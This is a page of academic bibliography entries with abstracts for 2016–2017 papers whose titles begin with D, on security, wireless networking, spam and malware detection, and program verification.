Visible to the public Biblio

Found 1474 results

Filters: First Letter Of Title is D  [Clear All Filters]
2017-09-27
Zhang, Huanle, Du, Wan, Zhou, Pengfei, Li, Mo, Mohapatra, Prasant.  2016.  DopEnc: Acoustic-based Encounter Profiling Using Smartphones. Proceedings of the 22Nd Annual International Conference on Mobile Computing and Networking. :294–307.
This paper presents DopEnc, an acoustic-based encounter profiling system on smartphones. DopEnc can automatically identify the persons that users interact with in the context of encountering. DopEnc performs encounter profiling in two major steps: (1) Doppler profiling to detect that two persons approach and stop in front of each other via an effective trajectory, and (2) voice profiling to confirm that they are thereafter engaged in an interactive conversation. DopEnc is further extended to support parallel acoustic exploration of many users by incorporating a unique multiple access scheme within the limited inaudible acoustic frequency band. All implementation of DopEnc is based on commodity sensors like speakers, microphones and accelerometers integrated on commercial-off-the-shelf smartphones. We evaluate DopEnc with detailed experiments and a real use-case study of 11 participants. Overall DopEnc achieves an accuracy of 6.9% false positive and 9.7% false negative in real usage.
2017-09-26
Padon, Oded, Immerman, Neil, Shoham, Sharon, Karbyshev, Aleksandr, Sagiv, Mooly.  2016.  Decidability of Inferring Inductive Invariants. Proceedings of the 43rd Annual ACM SIGPLAN-SIGACT Symposium on Principles of Programming Languages. :217–231.

Induction is a successful approach for verification of hardware and software systems. A common practice is to model a system using logical formulas, and then use a decision procedure to verify that some logical formula is an inductive safety invariant for the system. A key ingredient in this approach is coming up with the inductive invariant, which is known as invariant inference. This is a major difficulty, and it is often left for humans or addressed by sound but incomplete abstract interpretation. This paper is motivated by the problem of inductive invariants in shape analysis and in distributed protocols. This paper approaches the general problem of inferring first-order inductive invariants by restricting the language L of candidate invariants. Notice that the problem of invariant inference in a restricted language L differs from the safety problem, since a system may be safe and still not have any inductive invariant in L that proves safety. Clearly, if L is finite (and if testing an inductive invariant is decidable), then inferring invariants in L is decidable. This paper presents some interesting cases when inferring inductive invariants in L is decidable even when L is an infinite language of universal formulas. Decidability is obtained by restricting L and defining a suitable well-quasi-order on the state space. We also present some undecidability results that show that our restrictions are necessary. We further present a framework for systematically constructing infinite languages while keeping the invariant inference problem decidable. We illustrate our approach by showing the decidability of inferring invariants for programs manipulating linked-lists, and for distributed protocols.

2017-09-19
Bor, Martin C., Roedig, Utz, Voigt, Thiemo, Alonso, Juan M..  2016.  Do LoRa Low-Power Wide-Area Networks Scale? Proceedings of the 19th ACM International Conference on Modeling, Analysis and Simulation of Wireless and Mobile Systems. :59–67.

New Internet of Things (IoT) technologies such as Long Range (LoRa) are emerging which enable power efficient wireless communication over very long distances. Devices typically communicate directly to a sink node which removes the need of constructing and maintaining a complex multi-hop network. Given the fact that a wide area is covered and that all devices communicate directly to a few sink nodes a large number of nodes have to share the communication medium. LoRa provides for this reason a range of communication options (centre frequency, spreading factor, bandwidth, coding rates) from which a transmitter can choose. Many combination settings are orthogonal and provide simultaneous collision free communications. Nevertheless, there is a limit regarding the number of transmitters a LoRa system can support. In this paper we investigate the capacity limits of LoRa networks. Using experiments we develop models describing LoRa communication behaviour. We use these models to parameterise a LoRa simulation to study scalability. Our experiments show that a typical smart city deployment can support 120 nodes per 3.8 ha, which is not sufficient for future IoT deployments. LoRa networks can scale quite well, however, if they use dynamic communication parameter selection and/or multiple sinks.

Municio, Esteban, Latré, Steven.  2016.  Decentralized Broadcast-based Scheduling for Dense Multi-hop TSCH Networks. Proceedings of the Workshop on Mobility in the Evolving Internet Architecture. :19–24.

Wireless Sensor Networks (WSNs) are becoming more and more popular to support a wide range of Internet of Things (IoT) applications. Time-Slotted Channel Hopping (TSCH) is a technique to enable ultra reliable and ultra low-power wireless multi-hop networks. TSCH consist of a channel hopping scheme for sending link-layer frames in different time slots and frequencies in order to efficiently combat external interference and multi-path fading. The keystone of TSCH is the scheduling algorithm, which determines for every node at which opportunity (a combination of time slots and channels) it is allowed to send. However, current scheduling algorithms are not suited for dense deployments and have important scalability limitations. In this paper, we investigate TSCH's scheduling performance in dense deployments and show how the scheduling can be improved for such environments. We performed an extensive analysis of the scalability for different scheduling approaches showing the performance drops as the number of nodes increases. Moreover, we propose a novel textlessutextgreaterDetextless/utextgreatercentralized textlessutextgreaterBrtextless/utextgreateroadcast-based textlessutextgreaterStextless/utextgreatercheduling algorithm called DeBraS, based on selective broadcasting to inform nodes about each other's schedule. Through extensive simulations, we show that DeBraS is highly more scalable than centralized solutions and that it outperforms the current decentralized 6Tisch algorithms in up to 88.5% in terms of throughput for large network sizes.

Tromer, Eran, Schuster, Roei.  2016.  DroidDisintegrator: Intra-Application Information Flow Control in Android Apps. Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security. :401–412.

In mobile platforms and their app markets, controlling app permissions and preventing abuse of private information are crucial challenges. Information Flow Control (IFC) is a powerful approach for formalizing and answering user concerns such as: "Does this app send my geolocation to the Internet?" Yet despite intensive research efforts, IFC has not been widely adopted in mainstream programming practice. Abstract We observe that the typical structure of Android apps offers an opportunity for a novel and effective application of IFC. In Android, an app consists of a collection of a few dozen "components", each in charge of some high-level functionality. Most components do not require access to most resources. These components are a natural and effective granularity at which to apply IFC (as opposed to the typical process-level or language-level granularity). By assigning different permission labels to each component, and limiting information flow between components, it is possible to express and enforce IFC constraints. Yet nuances of the Android platform, such as its multitude of discretionary (and somewhat arcane) communication channels, raise challenges in defining and enforcing component boundaries. Abstract We build a system, DroidDisintegrator, which demonstrates the viability of component-level IFC for expressing and controlling app behavior. DroidDisintegrator uses dynamic analysis to generate IFC policies for Android apps, repackages apps to embed these policies, and enforces the policies at runtime. We evaluate DroidDisintegrator on dozens of apps.

Goyal, Shruti, Bindu, P. V., Thilagam, P. Santhi.  2016.  Dynamic Structure for Web Graphs with Extended Functionalities. Proceedings of the International Conference on Advances in Information Communication Technology & Computing. :46:1–46:6.

The hyperlink structure of World Wide Web is modeled as a directed, dynamic, and huge web graph. Web graphs are analyzed for determining page rank, fighting web spam, detecting communities, and so on, by performing tasks such as clustering, classification, and reachability. These tasks involve operations such as graph navigation, checking link existence, and identifying active links, which demand scanning of entire graphs. Frequent scanning of very large graphs involves more I/O operations and memory overheads. To rectify these issues, several data structures have been proposed to represent graphs in a compact manner. Even though the problem of representing graphs has been actively studied in the literature, there has been much less focus on representation of dynamic graphs. In this paper, we propose Tree-Dictionary-Representation (TDR), a compressed graph representation that supports dynamic nature of graphs as well as the various graph operations. Our experimental study shows that this representation works efficiently with limited main memory use and provides fast traversal of edges.

Hu, Xuan, Li, Banghuai, Zhang, Yang, Zhou, Changling, Ma, Hao.  2016.  Detecting Compromised Email Accounts from the Perspective of Graph Topology. Proceedings of the 11th International Conference on Future Internet Technologies. :76–82.

While email plays a growingly important role on the Internet, we are faced with more severe challenges brought by compromised email accounts, especially for the administrators of institutional email service providers. Inspired by the previous experience on spam filtering and compromised accounts detection, we propose several criteria, like Success Outdegree Proportion, Reverse Pagerank, Recipient Clustering Coefficient and Legitimate Recipient Proportion, for compromised email accounts detection from the perspective of graph topology in this paper. Specifically, several widely used social network analysis metrics are used and adapted according to the characteristics of mail log analysis. We evaluate our methods on a dataset constructed by mining the one month (30 days) mail log from an university with 118,617 local users and 11,460,399 mail log entries. The experimental results demonstrate that our methods achieve very positive performance, and we also prove that these methods can be efficiently applied on even larger datasets.

Hyun, Yoonjin, Kim, Namgyu.  2016.  Detecting Blog Spam Hashtags Using Topic Modeling. Proceedings of the 18th Annual International Conference on Electronic Commerce: E-Commerce in Smart Connected World. :43:1–43:6.

Tremendous amounts of data are generated daily. Accordingly, unstructured text data that is distributed through news, blogs, and social media has gained much attention from many researchers as this data contains abundant information about various consumers' opinions. However, as the usefulness of text data is increasing, attempts to gain profits by distorting text data maliciously or non-maliciously are also increasing. In this sense, various types of spam detection techniques have been studied to prevent the side effects of spamming. The most representative studies include e-mail spam detection, web spam detection, and opinion spam detection. "Spam" is recognized on the basis of three characteristics and actions: (1) if a certain user is recognized as a spammer, then all content created by that user should be recognized as spam; (2) if certain content is exposed to other users (regardless of the users' intention), then content is recognized as spam; and (3) any content that contains malicious or non-malicious false information is recognized as spam. Many studies have been performed to solve type (1) and type (2) spamming by analyzing various metadata, such as user networks and spam words. In the case of type (3), however, relatively few studies have been conducted because it is difficult to determine the veracity of a certain word or information. In this study, we regard a hashtag that is irrelevant to the content of a blog post as spam and devise a methodology to detect such spam hashtags.

Reaves, Bradley, Blue, Logan, Tian, Dave, Traynor, Patrick, Butler, Kevin R.B..  2016.  Detecting SMS Spam in the Age of Legitimate Bulk Messaging. Proceedings of the 9th ACM Conference on Security & Privacy in Wireless and Mobile Networks. :165–170.

Text messaging is used by more people around the world than any other communications technology. As such, it presents a desirable medium for spammers. While this problem has been studied by many researchers over the years, the recent increase in legitimate bulk traffic (e.g., account verification, 2FA, etc.) has dramatically changed the mix of traffic seen in this space, reducing the effectiveness of previous spam classification efforts. This paper demonstrates the performance degradation of those detectors when used on a large-scale corpus of text messages containing both bulk and spam messages. Against our labeled dataset of text messages collected over 14 months, the precision and recall of past classifiers fall to 23.8% and 61.3% respectively. However, using our classification techniques and labeled clusters, precision and recall rise to 100% and 96.8%. We not only show that our collected dataset helps to correct many of the overtraining errors seen in previous studies, but also present insights into a number of current SMS spam campaigns.

Huang, Jianjun, Zhang, Xiangyu, Tan, Lin.  2016.  Detecting Sensitive Data Disclosure via Bi-directional Text Correlation Analysis. Proceedings of the 2016 24th ACM SIGSOFT International Symposium on Foundations of Software Engineering. :169–180.

Traditional sensitive data disclosure analysis faces two challenges: to identify sensitive data that is not generated by specific API calls, and to report the potential disclosures when the disclosed data is recognized as sensitive only after the sink operations. We address these issues by developing BidText, a novel static technique to detect sensitive data disclosures. BidText formulates the problem as a type system, in which variables are typed with the text labels that they encounter (e.g., during key-value pair operations). The type system features a novel bi-directional propagation technique that propagates the variable label sets through forward and backward data-flow. A data disclosure is reported if a parameter at a sink point is typed with a sensitive text label. BidText is evaluated on 10,000 Android apps. It reports 4,406 apps that have sensitive data disclosures, with 4,263 apps having log based disclosures and 1,688 having disclosures due to other sinks such as HTTP requests. Existing techniques can only report 64.0% of what BidText reports. And manual inspection shows that the false positive rate for BidText is 10%.

2017-09-15
Nicholas, Charles, Brandon, Robert.  2016.  Document Engineering Issues in Malware Analysis. Proceedings of the 2016 ACM Symposium on Document Engineering. :3–3.

We present an overview of the field of malware analysis with emphasis on issues related to document engineering. We will introduce the field with a discussion of the types of malware, including executable binaries, malicious PDFs, polymorphic malware, ransomware, and exploit kits. We will conclude with our view of important research questions in the field. This is an updated version of last year's tutorial, with more information about web-based malware and malware targeting the Android market.

Nalla, Venu, Sahu, Rajeev Anand, Saraswat, Vishal.  2016.  Differential Fault Attack on SIMECK. Proceedings of the Third Workshop on Cryptography and Security in Computing Systems. :45–48.

In 2013, researchers from the National Security Agency of the USA (NSA) proposed two lightweight block ciphers SIMON and SPECK [3]. While SIMON is tuned for optimal performance in hardware, SPECK is tuned for optimal performance in software. At CHES 2015, Yang et al. [6] combined the "good" design components from both SIMON and SPECK and proposed a new lightweight block cipher SIMECK that is even more compact and efficient. In this paper we show that SIMECK is vulnerable to fault attacks and demonstrate two fault attacks on SIMECK. The first is a random bit-flip fault attack which recovers the n-bit last round key of Simeck using on average about n/2 faults and the second is a more practical, random byte fault attack which recovers the n-bit last round key of SIMECK using on average about n/6.5 faults.

Schulz, Matthias, Loch, Adrian, Hollick, Matthias.  2016.  DEMO: Demonstrating Practical Known-Plaintext Attacks Against Physical Layer Security in Wireless MIMO Systems. Proceedings of the 9th ACM Conference on Security & Privacy in Wireless and Mobile Networks. :201–203.

After being widely studied in theory, physical layer security schemes are getting closer to enter the consumer market. Still, a thorough practical analysis of their resilience against attacks is missing. In this work, we use software-defined radios to implement such a physical layer security scheme, namely, orthogonal blinding. To this end, we use orthogonal frequency-division multiplexing (OFDM) as a physical layer, similarly to WiFi. In orthogonal blinding, a multi-antenna transmitter overlays the data it transmits with noise in such a way that every node except the intended receiver is disturbed by the noise. Still, our known-plaintext attack can extract the data signal at an eavesdropper by means of an adaptive filter trained using a few known data symbols. Our demonstrator illustrates the iterative training process at the symbol level, thus showing the practicability of the attack.

Ghassemi, Mohsen, Sarwate, Anand D., Wright, Rebecca N..  2016.  Differentially Private Online Active Learning with Applications to Anomaly Detection. Proceedings of the 2016 ACM Workshop on Artificial Intelligence and Security. :117–128.

In settings where data instances are generated sequentially or in streaming fashion, online learning algorithms can learn predictors using incremental training algorithms such as stochastic gradient descent. In some security applications such as training anomaly detectors, the data streams may consist of private information or transactions and the output of the learning algorithms may reveal information about the training data. Differential privacy is a framework for quantifying the privacy risk in such settings. This paper proposes two differentially private strategies to mitigate privacy risk when training a classifier for anomaly detection in an online setting. The first is to use a randomized active learning heuristic to screen out uninformative data points in the stream. The second is to use mini-batching to improve classifier performance. Experimental results show how these two strategies can trade off privacy, label complexity, and generalization performance.

Sillaber, Christian, Sauerwein, Clemens, Mussmann, Andrea, Breu, Ruth.  2016.  Data Quality Challenges and Future Research Directions in Threat Intelligence Sharing Practice. Proceedings of the 2016 ACM on Workshop on Information Sharing and Collaborative Security. :65–70.

In the last couple of years, organizations have demonstrated an increased willingness to participate in threat intelligence sharing platforms. The open exchange of information and knowledge regarding threats, vulnerabilities, incidents and mitigation strategies results from the organizations' growing need to protect against today's sophisticated cyber attacks. To investigate data quality challenges that might arise in threat intelligence sharing, we conducted focus group discussions with ten expert stakeholders from security operations centers of various globally operating organizations. The study addresses several factors affecting shared threat intelligence data quality at multiple levels, including collecting, processing, sharing and storing data. As expected, the study finds that the main factors that affect shared threat intelligence data stem from the limitations and complexities associated with integrating and consolidating shared threat intelligence from different sources while ensuring the data's usefulness for an inhomogeneous group of participants.Data quality is extremely important for shared threat intelligence. As our study has shown, there are no fundamentally new data quality issues in threat intelligence sharing. However, as threat intelligence sharing is an emerging domain and a large number of threat intelligence sharing tools are currently being rushed to market, several data quality issues – particularly related to scalability and data source integration – deserve particular attention.

2017-09-11
Van Acker, Steven, Hausknecht, Daniel, Sabelfeld, Andrei.  2016.  Data Exfiltration in the Face of CSP. Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security. :853–864.

Cross-site scripting (XSS) attacks keep plaguing the Web. Supported by most modern browsers, Content Security Policy (CSP) prescribes the browser to restrict the features and communication capabilities of code on a web page, mitigating the effects of XSS.

This paper puts a spotlight on the problem of data exfiltration in the face of CSP. We bring attention to the unsettling discord in the security community about the very goals of CSP when it comes to preventing data leaks.

As consequences of this discord, we report on insecurities in the known protection mechanisms that are based on assumptions about CSP that turn out not to hold in practice.

To illustrate the practical impact of the discord, we perform a systematic case study of data exfiltration via DNS prefetching and resource prefetching in the face of CSP.

Our study of the popular browsers demonstrates that it is often possible to exfiltrate data by both resource prefetching and DNS prefetching in the face of CSP. Further, we perform a crawl of the top 10,000 Alexa domains to report on the cohabitance of CSP and prefetching in practice. Finally, we discuss directions to control data exfiltration and, for the case study, propose measures ranging from immediate fixes for the clients to prefetching-aware extensions of CSP.

Baumann, Peter, Katzenbeisser, Stefan, Stopczynski, Martin, Tews, Erik.  2016.  Disguised Chromium Browser: Robust Browser, Flash and Canvas Fingerprinting Protection. Proceedings of the 2016 ACM on Workshop on Privacy in the Electronic Society. :37–46.

Browser fingerprinting is a widely used technique to uniquely identify web users and to track their online behavior. Until now, different tools have been proposed to protect the user against browser fingerprinting. However, these tools have usability restrictions as they deactivate browser features and plug-ins (like Flash) or the HTML5 canvas element. In addition, all of them only provide limited protection, as they randomize browser settings with unrealistic parameters or have methodical flaws, making them detectable for trackers. In this work we demonstrate the first anti-fingerprinting strategy, which protects against Flash fingerprinting without deactivating it, provides robust and undetectable anti-canvas fingerprinting, and uses a large set of real word data to hide the actual system and browser properties without losing usability. We discuss the methods and weaknesses of existing anti-fingerprinting tools in detail and compare them to our enhanced strategies. Our evaluation against real world fingerprinting tools shows a successful fingerprinting protection in over 99% of 70.000 browser sessions.

2017-09-05
Luo, Chu, Fylakis, Angelos, Partala, Juha, Klakegg, Simon, Goncalves, Jorge, Liang, Kaitai, Seppänen, Tapio, Kostakos, Vassilis.  2016.  A Data Hiding Approach for Sensitive Smartphone Data. Proceedings of the 2016 ACM International Joint Conference on Pervasive and Ubiquitous Computing. :557–568.

We develop and evaluate a data hiding method that enables smartphones to encrypt and embed sensitive information into carrier streams of sensor data. Our evaluation considers multiple handsets and a variety of data types, and we demonstrate that our method has a computational cost that allows real-time data hiding on smartphones with negligible distortion of the carrier stream. These characteristics make it suitable for smartphone applications involving privacy-sensitive data such as medical monitoring systems and digital forensics tools.

Basan, Alexander, Basan, Elena, Makarevich, Oleg.  2016.  Development of the Hierarchal Trust Management System for Mobile Cluster-based Wireless Sensor Network. Proceedings of the 9th International Conference on Security of Information and Networks. :116–122.

In this paper a model of secure wireless sensor network (WSN) was developed. This model is able to defend against most of known network attacks and don't significantly reduce the energy power of sensor nodes (SN). We propose clustering as a way of network organization, which allows reducing energy consumption. Network protection is based on the trust level calculation and the establishment of trusted relationships between trusted nodes. The primary purpose of the hierarchical trust management system (HTMS) is to protect the WSN from malicious actions of an attacker. The developed system should combine the properties of energy efficiency and reliability. To achieve this goal the following tasks are performed: detection of illegal actions of an intruder; blocking of malicious nodes; avoiding of malicious attacks; determining the authenticity of nodes; the establishment of trusted connections between authentic nodes; detection of defective nodes and the blocking of their work. The HTMS operation based on the use of Bayes' theorem and calculation of direct and centralized trust values.

Zhu, Jun, Chu, Bill, Lipford, Heather.  2016.  Detecting Privilege Escalation Attacks Through Instrumenting Web Application Source Code. Proceedings of the 21st ACM on Symposium on Access Control Models and Technologies. :73–80.

Privilege Escalation is a common and serious type of security attack. Although experience shows that many applications are vulnerable to such attacks, attackers rarely succeed upon first trial. Their initial probing attempts often fail before a successful breach of access control is achieved. This paper presents an approach to automatically instrument application source code to report events of failed access attempts that may indicate privilege escalation attacks to a run time application protection mechanism. The focus of this paper is primarily on the problem of instrumenting web application source code to detect access control attack events. We evaluated false positives and negatives of our approach using two open source web applications.

Siddiqui, Sana, Khan, Muhammad Salman, Ferens, Ken, Kinsner, Witold.  2016.  Detecting Advanced Persistent Threats Using Fractal Dimension Based Machine Learning Classification. Proceedings of the 2016 ACM on International Workshop on Security And Privacy Analytics. :64–69.

Advanced Persistent Threats (APTs) are a new breed of internet based smart threats, which can go undetected with the existing state of-the-art internet traffic monitoring and protection systems. With the evolution of internet and cloud computing, a new generation of smart APT attacks has also evolved and signature based threat detection systems are proving to be futile and insufficient. One of the essential strategies in detecting APTs is to continuously monitor and analyze various features of a TCP/IP connection, such as the number of transferred packets, the total count of the bytes exchanged, the duration of the TCP/IP connections, and details of the number of packet flows. The current threat detection approaches make extensive use of machine learning algorithms that utilize statistical and behavioral knowledge of the traffic. However, the performance of these algorithms is far from satisfactory in terms of reducing false negatives and false positives simultaneously. Mostly, current algorithms focus on reducing false positives, only. This paper presents a fractal based anomaly classification mechanism, with the goal of reducing both false positives and false negatives, simultaneously. A comparison of the proposed fractal based method with a traditional Euclidean based machine learning algorithm (k-NN) shows that the proposed method significantly outperforms the traditional approach by reducing false positive and false negative rates, simultaneously, while improving the overall classification rates.

2017-09-01
Carmen Cheh, University of Illinois at Urbana-Champaign, Binbin Chen, Advanced Digital Sciences Center, Singapore, William G. Temple, A, Advanced Digital Sciences Center, Singapore, William H. Sanders, University of Illinois at Urbana-Champaign.  2017.  Data-Driven Model-Based Detection of Malicious Insiders via Physical Access Logs. 14th International Conference on Quantitative Evaluation of Systems (QEST 2017).

The risk posed by insider threats has usually been approached by analyzing the behavior of users solely in the cyber domain. In this paper, we show the viability of using physical movement logs, collected via a building access control system, together with an understanding of the layout of the building housing the system’s assets, to detect malicious insider behavior that manifests itself in the physical domain. In particular, we propose a systematic framework that uses contextual knowledge about the system and its users, learned from historical data gathered from a building access control system, to select suitable models for representing movement behavior. We then explore the online usage of the learned models, together with knowledge about the layout of the building being monitored, to detect malicious insider behavior. Finally, we show the effectiveness of the developed framework using real-life data traces of user movement in railway transit stations.

2017-08-22
Garcia, Sebastian, Pechoucek, Michal.  2016.  Detecting the Behavioral Relationships of Malware Connections. Proceedings of the 1st International Workshop on AI for Privacy and Security. :8:1–8:5.

A normal computer infected with malware is difficult to detect. There have been several approaches in the last years which analyze the behavior of malware and obtain good results. The malware traffic may be detected, but it is very common to miss-detect normal traffic as malicious and generate false positives. This is specially the case when the methods are tested in real and large networks. The detection errors are generated due to the malware changing and rapidly adapting its domains and patterns to mimic normal connections. To better detect malware infections and separate them from normal traffic we propose to detect the behavior of the group of connections generated by the malware. It is known that malware usually generates various related connections simultaneously and therefore it shows a group pattern. Based on previous experiments, this paper suggests that the behavior of a group of connections can be modelled as a directed cyclic graph with special properties, such as its internal patterns, relationships, frequencies and sequences of connections. By training the group models on known traffic it may be possible to better distinguish between a malware connection and a normal connection.

Buczak, Anna L., Hanke, Paul A., Cancro, George J., Toma, Michael K., Watkins, Lanier A., Chavis, Jeffrey S..  2016.  Detection of Tunnels in PCAP Data by Random Forests. Proceedings of the 11th Annual Cyber and Information Security Research Conference. :16:1–16:4.

This paper describes an approach for detecting the presence of domain name system (DNS) tunnels in network traffic. DNS tunneling is a common technique hackers use to establish command and control nodes and to exfiltrate data from networks. To generate the training data sufficient to build models to detect DNS tunneling activity, a penetration testing effort was employed. We extracted features from this data and trained random forest classifiers to distinguish normal DNS activity from tunneling activity. The classifiers successfully detected the presence of tunnels we trained on, and four other types of tunnels that were not a part of the training set.

Jeyakumar, Vimalkumar, Madani, Omid, ParandehGheibi, Ali, Yadav, Navindra.  2016.  Data Driven Data Center Network Security. Proceedings of the 2016 ACM on International Workshop on Security And Privacy Analytics. :48–48.

Large scale datacenters are becoming the compute and data platform of large enterprises, but their scale makes them difficult to secure applications running within. We motivate this setting using a real world complex scenario, and propose a data-driven approach to taming this complexity. We discuss several machine learning problems that arise, in particular focusing on inducing so-called whitelist communication policies, from observing masses of communications among networked computing nodes. Briefly, a whitelist policy specifies which machine, or groups of machines, can talk to which. We present some of the challenges and opportunities, such as noisy and incomplete data, non-stationarity, lack of supervision, challenges of evaluation, and describe some of the approaches we have found promising.